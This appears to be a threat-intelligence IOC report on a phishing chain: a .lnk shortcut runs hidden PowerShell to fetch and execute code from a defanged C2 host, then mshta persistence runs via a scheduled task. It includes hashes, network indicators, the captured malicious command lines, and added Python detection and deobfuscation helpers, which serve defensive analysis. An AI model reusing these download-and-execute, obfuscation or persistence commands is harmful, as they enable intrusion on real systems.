
#ps_b64_070219

VRad Feb 7th, 2019 (edited)
#IOC #OptiData #VR #LNK #powershell #fingerprinting #heavyobfuscated

https://pastebin.com/s6ymr2x5

attack_vector
--------------
email attach .lnk > powershell > get base64 > decode > fingerprint system

email_headers
--------------
n/a

files
--------------
SHA-256 18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460
File name   КМУ база даних.zip  [Zip archive data, at least v2.0 to extract]
File size   317.6 KB

SHA-256 3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b
File name   sample.rtf.lnk      [MS Windows shortcut, Item id list present, Points to a file or directory]
File size   3.08 KB
activity
**************
PL_SC   =   cdn1186{.} site/zG4roJ

C2      =   cdn1186{.} site/ua/news

netwrk
--------------
88.85.86.229    cdn1186{.} site GET /zG4roJ HTTP/1.1    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

88.85.86.229    cdn1186{.} site POST /ua/news HTTP/1.1  noUA

comp
--------------
powershell.exe  1544    TCP 88.85.86.229    80  ESTABLISHED

proc
--------------
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
-NoP -NonI -W hidden -Com "$cx=New-Object -ComObject MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186{.} site/zG4roJ',$False);
$cx.Send();$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')

C:\Windows\system32\schtasks.exe /create /tn FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0} /sc hourly /mo 2 /tr "MsHTa.EXe 'JaVAsCRIpT:var pata='efada'; var naxe='ifero'; var dhf=new ActiveXObject('\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c');
var GJj=dhf.RegRead('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso');eval(GJj);close();' "

C:\Windows\system32\schtasks.exe /QUERY /FO CSV
C:\Windows\system32\cmd.exe /c chcp 866 & SYSTEMINFO /FO CSV /NH 2>&1
C:\Windows\system32\chcp.com
C:\Windows\system32\systeminfo.exe  /FO CSV /NH
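The proc section above records three things a defender wants to match in process telemetry: a hidden-window PowerShell stager that fetches the next stage through the MsXml2.ServerXmlHttp COM object and feeds it to an Invoke-Expression alias spelled by indexing into a .NET method's overload text, an mshta "javascript:" launcher that reads its real payload from the registry and eval()s it, and a scheduled task that re-runs that launcher. The Python below is an added example, not part of the original paste: it flags each observed command line against rules written from this report's own indicators and resolves the two obfuscation tricks so an analyst can read them. The text of ''.Remove.ToString() it relies on is assumed to be what Windows PowerShell 5.1 returns; the sample telemetry is constructed from the command lines recorded above plus one benign line.

```python
"""Triage helpers for the LNK > PowerShell > mshta chain in this report.

Added example; not part of the original paste. It takes process command
lines (Sysmon event 1, EDR telemetry) and (1) flags the techniques the
report records, (2) resolves the two obfuscation tricks so an analyst can
read what the command actually does.
"""
import re

# Detection rules written against the command lines in the report.
# Case-insensitive because the actor mixed case ("MsHTa.EXe", "JaVAsCRIpT:").
RULES = [
    # Hidden-window PowerShell that downloads via the MsXml2.ServerXmlHttp COM object
    ("ps_hidden_serverxmlhttp_stager",
     re.compile(r"powershell.*?-W\s+hidden.*?MsXml2\.ServerXmlHttp", re.I | re.S)),
    # ''.Remove.ToString()[14,50,27]-Join'' : indexes into a .NET method's
    # overload text to spell an Invoke-Expression alias without writing it
    ("ps_method_overload_iex_alias",
     re.compile(r"\.ToString\(\)\s*\[\s*\d+(?:\s*,\s*\d+)+\s*\]\s*-Join", re.I)),
    # mshta "javascript:" launcher that pulls its payload from the registry and eval()s it
    ("mshta_javascript_regread_eval",
     re.compile(r"mshta\.exe.*?javascript:.*?RegRead\(.*?eval\(", re.I | re.S)),
    # Scheduled task whose action is that mshta launcher
    ("schtasks_create_mshta_persistence",
     re.compile(r'schtasks(?:\.exe)?\s+/create.*?/tr\s+"?mshta', re.I | re.S)),
]


def classify(cmdline):
    """Return the names of every rule that fires on one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Map line index -> fired rules, for every line that matched at least one rule."""
    hits = {}
    for i, line in enumerate(cmdlines):
        fired = classify(line)
        if fired:
            hits[i] = fired
    return hits


# Assumed text of ''.Remove.ToString() on Windows PowerShell 5.1 (the overload
# definitions joined by ", "); the stager indexes into this string.
REMOVE_OVERLOADS = ("string Remove(int startIndex, int count), "
                    "string Remove(int startIndex)")


def resolve_overload_indexing(cmdline, overloads=REMOVE_OVERLOADS):
    """Resolve .ToString()[i,j,k] to the characters it selects, or None if absent."""
    m = re.search(r"\.ToString\(\)\s*\[([\d,\s]+)\]", cmdline)
    if not m:
        return None
    idx = [int(x) for x in m.group(1).split(",")]
    return "".join(overloads[i] if i < len(overloads) else "?" for i in idx)


def decode_hex_escapes(text):
    """Turn JScript \\xNN escapes (e.g. the ActiveXObject ProgID in the mshta payload) into text."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)


# Constructed sample telemetry: the report's command lines plus one benign line.
SAMPLE_CMDLINES = [
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W hidden -Com "$cx=New-Object -ComObject MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186{.} site/zG4roJ',$False);$cx.Send();$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')''',
    r'''C:\Windows\system32\schtasks.exe /create /tn FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0} /sc hourly /mo 2 /tr "MsHTa.EXe 'JaVAsCRIpT:var pata='efada'; var naxe='ifero'; var dhf=new ActiveXObject('\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c'); var GJj=dhf.RegRead('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso');eval(GJj);close();' "''',
    r"C:\Windows\system32\systeminfo.exe  /FO CSV /NH",
]

if __name__ == "__main__":
    for i, fired in scan(SAMPLE_CMDLINES).items():
        print(i, fired)
    print("index trick resolves to:", resolve_overload_indexing(SAMPLE_CMDLINES[0]))
    print("ProgID decodes to:", decode_hex_escapes(
        r"\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c"))
```

Run the file directly to see the rule hits per line; under the stated assumption about the overload text, the [14,50,27] index list resolves to "iex", and the \x escapes in the mshta payload resolve to the WScript.Shell ProgID. The rules deliberately require the download object or the registry-read-plus-eval pairing rather than "hidden PowerShell" or "mshta" alone, which keeps them quiet on ordinary administrative use.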

persist
--------------
Task Scheduler
\FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0}
Microsoft (R) HTML Application host
Microsoft Corporation   c:\windows\syswow64\mshta.exe   14.10.2013 7:50

"MsHTa.EXe" "JaVAsCRIpT:var pata="efada"; var naxe="ifero";
var dhf=new ActiveXObject("\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c");
var GJj=dhf.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso");eval(GJj);close();"

drop
--------------
n/a

# # #
https://www.virustotal.com/#/file/18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460/details
https://www.virustotal.com/#/file/3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b/details

VR

@